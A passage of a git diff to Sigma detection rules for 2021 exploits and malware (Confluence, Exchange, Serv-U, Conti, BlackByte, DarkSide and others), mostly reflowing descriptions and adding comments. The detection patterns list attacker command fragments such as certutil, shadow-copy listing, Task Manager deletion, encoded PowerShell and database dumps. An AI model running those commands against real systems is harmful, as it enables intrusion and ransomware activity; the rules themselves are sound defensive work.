+1,7 @@ title: Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt id: 245f92e3-c4da-45f1-9070-bc552e06db11 status: test -description: Detects spawning of suspicious child processes by Atlassian Confluence - server which may indicate successful exploitation of CVE-2021-26084 +description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 references: - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html @@ -25,7 +24,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + # Monitor suspicious child processes spawned by Confluence + CommandLine|contains: - certutil - cmd /c - cmd /k diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml index e959ace15..e94eb7e3c 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml @@ -1,9 +1,7 @@ title: Potential CVE-2021-26857 Exploitation Attempt id: cd479ccc-d8f0-4c66-ba7d-e06286f3f887 status: stable -description: Detects possible successful exploitation for vulnerability described - in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange - Server's Unified Messaging service +description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service references: - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ author: Bhabesh Raj @@ -24,7 +22,7 @@ detection: selection: ParentProcessName|endswith: \UMWorkerProcess.exe filter: - NewProcessName|endswith: + NewProcessName|endswith: - wermgr.exe - WerFault.exe condition: process_creation and (selection and not filter) diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml index 8026ba59c..f00a0f98b 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml @@ -1,8 +1,7 @@ title: Serv-U Exploitation CVE-2021-35211 by DEV-0322 id: 75578840-9526-4b2a-9462-af469a45e767 status: test -description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 - vulnerability by threat group DEV-0322 +description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322 references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ author: Florian Roth (Nextron Systems) @@ -13,6 +12,7 @@ tags: - attack.t1136.001 - cve.2021.35211 - detection.emerging_threats + # - threat_group.DEV-0322 logsource: category: process_creation product: windows @@ -21,13 +21,13 @@ detection: EventID: 4688 Channel: Security selection_whoami: - CommandLine|contains: whoami + CommandLine|contains: whoami selection_cmd_1: - CommandLine|contains: + CommandLine|contains: - ./Client/Common/ - .\Client\Common\ selection_cmd_2: - CommandLine|contains: C:\Windows\Temp\Serv-U.bat + CommandLine|contains: C:\Windows\Temp\Serv-U.bat condition: process_creation and (selection_whoami and 1 of selection_cmd*) falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml index b7ee438cc..9e22c47ec 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml @@ -1,8 +1,7 @@ title: Potential CVE-2021-40444 Exploitation Attempt id: 894397c6-da03-425c-a589-3d09e7d1f750 status: test -description: Detects potential exploitation of CVE-2021-40444 via suspicious process - patterns seen in in-the-wild exploitations +description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 - https://twitter.com/neonprimetime/status/1435584010202255375 @@ -23,13 +22,13 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \control.exe + NewProcessName|endswith: \control.exe ParentProcessName|endswith: - \winword.exe - \powerpnt.exe - \excel.exe filter: - CommandLine|endswith: + CommandLine|endswith: - \control.exe input.dll - \control.exe" input.dll condition: process_creation and (selection and not filter) diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml index 59ce31cdd..76b60849e 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml @@ -1,9 +1,7 @@ title: Potential Exploitation Attempt From Office Application id: 868955d9-697e-45d4-a3da-360cefd7c216 status: test -description: Detects Office applications executing a child process that includes directory - traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) - or CVE-2021-40444 (MSHTML RCE) +description: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE) references: - https://twitter.com/sbousseaden/status/1531653369546301440 - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444 @@ -24,7 +22,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ../../../.. - ..\..\..\.. - ..//..//..//.. diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml index 3a6a62820..27d810c6e 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml @@ -1,10 +1,7 @@ title: Potential CVE-2021-41379 Exploitation Attempt id: af8bbce4-f751-46b4-8d91-82a33a736f61 status: test -description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), - a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" - process as a child of Microsoft Edge elevation service "elevation_service" with - "LOCAL_SYSTEM" rights +description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights references: - https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver - https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/ @@ -26,14 +23,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \cmd.exe - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - Cmd.Exe - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE + - pwsh.dll selection_parent: ParentProcessName|endswith: \elevation_service.exe MandatoryLabel: S-1-16-16384 diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml index 5639a7ab9..a1c4090e3 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: application + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: application: Channel: Application diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-42278/win_system_exploit_cve_2021_42278.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-42278/win_system_exploit_cve_2021_42278.yml index 49de98d57..dad2d257f 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-42278/win_system_exploit_cve_2021_42278.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-42278/win_system_exploit_cve_2021_42278.yml @@ -1,18 +1,13 @@ title: Potential CVE-2021-42278 Exploitation Attempt id: 44bbff3e-4ca3-452d-a49a-6efa4cafa06f related: - - id: e80a0fee-1a62-4419-b31e-0d0db6e6013a - type: similar + - id: e80a0fee-1a62-4419-b31e-0d0db6e6013a + type: similar status: test -description: 'The attacker creates a computer object using those permissions with - a password known to her. - +description: | + The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. - - Because she created the object (CREATOR OWNER), she gets granted additional permissions - and can do many changes to the object. - - ' + Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object. references: - https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/ author: frack113 @@ -30,12 +25,12 @@ detection: system: Channel: System selection: - Provider_Name: Microsoft-Windows-Kerberos-Key-Distribution-Center + Provider_Name: Microsoft-Windows-Kerberos-Key-Distribution-Center # Active Directory EventID: - - 35 - - 36 - - 37 - - 38 + - 35 # PAC without attributes + - 36 # Ticket without a PAC + - 37 # Ticket without Requestor + - 38 # Requestor Mismatch condition: system and selection falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-42287/win_security_samaccountname_spoofing_cve_2021_42287.yml b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-42287/win_security_samaccountname_spoofing_cve_2021_42287.yml index 90c28bc83..f8b3669b4 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-42287/win_security_samaccountname_spoofing_cve_2021_42287.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/CVE-2021-42287/win_security_samaccountname_spoofing_cve_2021_42287.yml @@ -1,8 +1,7 @@ title: Suspicious Computer Account Name Change CVE-2021-42287 id: 45eb2ae2-9aa2-4c3a-99a5-6e5077655466 status: test -description: Detects the renaming of an existing computer account to a account name - that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287 +description: Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287 references: - https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45 author: Florian Roth (Nextron Systems) @@ -22,7 +21,7 @@ detection: security: Channel: Security selection: - EventID: 4781 + EventID: 4781 # rename user OldTargetUserName|contains: $ filter: NewTargetUserName|contains: $ diff --git a/sigma/builtin/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml b/sigma/builtin/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml index 3bb91f370..da9ea7a6f 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml @@ -1,9 +1,7 @@ title: Suspicious RazerInstaller Explorer Subprocess id: a4eaf250-7dc1-4842-862a-5e71cd59a167 status: test -description: Detects a explorer.exe sub process of the RazerInstaller software which - can be invoked from the installer to select a different installation folder but - can also be exploited to escalate privileges to LOCAL SYSTEM +description: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM references: - https://twitter.com/j0nh4t/status/1429049506021138437 - https://streamable.com/q2dsji @@ -25,10 +23,9 @@ detection: ParentProcessName|endswith: \RazerInstaller.exe MandatoryLabel: S-1-16-16384 filter: - NewProcessName|startswith: C:\Windows\Installer\Razer\Installer\ + NewProcessName|startswith: C:\Windows\Installer\Razer\Installer\ condition: process_creation and (selection and not filter) falsepositives: - - User selecting a different installation folder (check for other sub processes - of this explorer.exe process) + - User selecting a different installation folder (check for other sub processes of this explorer.exe process) level: high ruletype: Sigma diff --git a/sigma/builtin/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml b/sigma/builtin/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml index 9dc52b1cc..e0c9bd606 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml @@ -1,8 +1,7 @@ title: Potential SystemNightmare Exploitation Attempt id: c01f7bd6-0c1d-47aa-9c61-187b91273a16 status: test -description: Detects an exploitation attempt of SystemNightmare in order to obtain - a shell as LOCAL_SYSTEM +description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM references: - https://github.com/GossiTheDog/SystemNightmare author: Florian Roth (Nextron Systems) @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - printnightmare.gentilkiwi.com - ' /user:gentilguest ' - Kiwi Legit Printer diff --git a/sigma/builtin/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml b/sigma/builtin/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml index c3c138c58..2fbf20afa 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml @@ -1,8 +1,7 @@ title: CVE-2021-31979 CVE-2021-33771 Exploits id: 32b5db62-cb5f-4266-9639-0fa48376ac00 status: experimental -description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 - CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum +description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum references: - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ @@ -16,6 +15,7 @@ tags: - cve.2021.33771 - cve.2021.31979 - detection.emerging_threats + # - threat_group.Sourgum logsource: product: windows category: registry_set diff --git a/sigma/builtin/emerging-threats/2021/Exploits/win_exchange_cve_2021_42321.yml b/sigma/builtin/emerging-threats/2021/Exploits/win_exchange_cve_2021_42321.yml index 3fdaaa0e9..b852c739f 100644 --- a/sigma/builtin/emerging-threats/2021/Exploits/win_exchange_cve_2021_42321.yml +++ b/sigma/builtin/emerging-threats/2021/Exploits/win_exchange_cve_2021_42321.yml @@ -1,8 +1,7 @@ title: Possible Exploitation of Exchange RCE CVE-2021-42321 id: c92f1896-d1d2-43c3-92d5-7a5b35c217bb status: test -description: Detects log entries that appear in exploitation attempts against MS Exchange - RCE CVE-2021-42321 +description: Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321 references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321 author: Florian Roth (Nextron Systems), @testanull @@ -15,6 +14,7 @@ tags: logsource: product: windows service: msexchange-management + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: msexchange_management: Channel: MSExchange Management diff --git a/sigma/builtin/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml b/sigma/builtin/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml index 15761a669..8e07648bc 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml @@ -1,8 +1,7 @@ title: Potential BlackByte Ransomware Activity id: 999e8307-a775-4d5f-addc-4855632335be status: test -description: Detects command line patterns used by BlackByte ransomware in different - operations +description: Detects command line patterns used by BlackByte ransomware in different operations references: - https://redcanary.com/blog/blackbyte-ransomware/ author: Florian Roth (Nextron Systems) @@ -25,10 +24,10 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: ' -single ' - NewProcessName|startswith: C:\Users\Public\ + CommandLine|contains: ' -single ' + NewProcessName|startswith: C:\Users\Public\ selection_2: - CommandLine|contains: + CommandLine|contains: - del C:\Windows\System32\Taskmgr.exe - ;Set-Service -StartupType Disabled $ - powershell -command "$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( diff --git a/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml b/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml index c7b54a6eb..a1cee1e23 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml @@ -19,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - vssadmin list shadows - log.txt condition: process_creation and selection diff --git a/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml b/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml index 89e0e2547..96ab7caba 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml @@ -20,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - 7za.exe - \\C$\\temp\\log.zip condition: process_creation and selection diff --git a/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml b/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml index 87404e214..dbb15619a 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml @@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - '-m ' - '-net ' - - '-size ' + - '-size ' # Size 10 in references - '-nomutex ' - -p \\\\ - $ diff --git a/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml b/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml index 4f950499b..3f3b4fccc 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml @@ -3,7 +3,7 @@ id: 2f47f1fd-0901-466e-a770-3b7092834a1b status: test description: Detects a command used by conti to dump database references: - - https://twitter.com/vxunderground/status/1423336151860002816?s=20 + - https://twitter.com/vxunderground/status/1423336151860002816?s=20 # The leak info not the files itself - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection - https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15 author: frack113 @@ -21,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_tools: - - NewProcessName|endswith: \sqlcmd.exe - - CommandLine|contains: - - 'sqlcmd ' - - sqlcmd.exe + - NewProcessName|endswith: \sqlcmd.exe + - CommandLine|contains: + - 'sqlcmd ' + - sqlcmd.exe selection_svr: - CommandLine|contains: ' -S localhost ' + CommandLine|contains: ' -S localhost ' selection_query: - CommandLine|contains: + CommandLine|contains: - sys.sysprocesses - master.dbo.sysdatabases - BACKUP DATABASE diff --git a/sigma/builtin/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml b/sigma/builtin/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml index 88a9b57cb..ca667dbe3 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml @@ -20,12 +20,12 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: + CommandLine|contains: - =[char][byte]('0x'+ - ' -work worker0 -path ' selection2: ParentCommandLine|contains: DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} - NewProcessName|contains: \AppData\Local\Temp\ + NewProcessName|contains: \AppData\Local\Temp\ condition: process_creation and (1 of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml b/sigma/builtin/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml index 0e83fc9b9..0b71d9f68 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml @@ -1,8 +1,8 @@ title: Potential Devil Bait Malware Reconnaissance id: e8954be4-b2b8-4961-be18-da1a5bda709c related: - - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 - type: derived + - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 + type: derived status: experimental description: Detects specific process behavior observed with Devil Bait samples references: @@ -22,14 +22,16 @@ detection: EventID: 4688 Channel: Security selection_redirect: - CommandLine|contains: '>>%APPDATA%\Microsoft\' - CommandLine|endswith: + CommandLine|contains: '>>%APPDATA%\Microsoft\' + CommandLine|endswith: - .xml - .txt ParentProcessName|endswith: \wscript.exe - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe selection_recon_cmd: - CommandLine|contains: + CommandLine|contains: + # Taken from a6f9043627f8be2452153b5dbf6278e9b91763c3b5c2aea537a859e0c8c6b504 + # If you find samples using other commands please add them - dir - ipconfig /all - systeminfo diff --git a/sigma/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml b/sigma/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml index afa74e96f..b6dea421d 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml @@ -1,8 +1,7 @@ title: Potential Goofy Guineapig Backdoor Activity id: 477a5ed3-a374-4282-9f3b-ed94e159a108 status: experimental -description: Detects a specific broken command that was used by Goofy-Guineapig as - described by the NCSC report. +description: Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report. references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf author: X__Junior (Nextron Systems) @@ -18,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: choice /t %d /d y /n >nul + CommandLine|contains: choice /t %d /d y /n >nul condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml b/sigma/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml index 51434e54b..df83e5aee 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml @@ -1,8 +1,7 @@ title: Potential Goofy Guineapig GoolgeUpdate Process Anomaly id: bdbab15a-3826-48fa-a1b7-723cd8f32fcc status: experimental -description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon - location as seen used by the Goofy Guineapig backdoor +description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) @@ -19,12 +18,12 @@ detection: Channel: Security selection: ParentProcessName|endswith: \GoogleUpdate.exe - NewProcessName|endswith: \GoogleUpdate.exe + NewProcessName|endswith: \GoogleUpdate.exe filter_main_legit_paths: - - NewProcessName|startswith: - - C:\Program Files\Google\ - - C:\Program Files (x86)\Google\ - - NewProcessName|contains: \AppData\Local\Google\Update\ + - NewProcessName|startswith: + - C:\Program Files\Google\ + - C:\Program Files (x86)\Google\ + - NewProcessName|contains: \AppData\Local\Google\Update\ condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml b/sigma/builtin/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml index 68ecac7c0..7d204765c 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml @@ -1,13 +1,12 @@ title: Pingback Backdoor Activity id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 related: - - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b - type: similar - - id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 - type: similar + - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b # DLL Load + type: similar + - id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 # File Indicators + type: similar status: test -description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 - as described in the trustwave report +description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report references: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 @@ -26,7 +25,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - config - msdtc - start diff --git a/sigma/builtin/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml b/sigma/builtin/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml index cfd19427b..bbd432ddf 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml @@ -1,8 +1,7 @@ title: Small Sieve Malware CommandLine Indicator id: 21117127-21c8-437a-ae03-4b51e5a8a088 status: test -description: Detects specific command line argument being passed to a binary as seen - being used by the malware Small Sieve. +description: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve. references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf author: Nasreddine Bencherchali (Nextron Systems) @@ -19,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|endswith: .exe Platypus + CommandLine|endswith: .exe Platypus condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml b/sigma/builtin/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml index 45c58bb6c..8435c429c 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml @@ -1,8 +1,7 @@ title: Small Sieve Malware Registry Persistence id: 65c6e3c1-fb28-4c03-a51e-84919d8185f1 status: experimental -description: Detects registry value with specific intentional typo and strings seen - used by the Small Sieve malware +description: Detects registry value with specific intentional typo and strings seen used by the 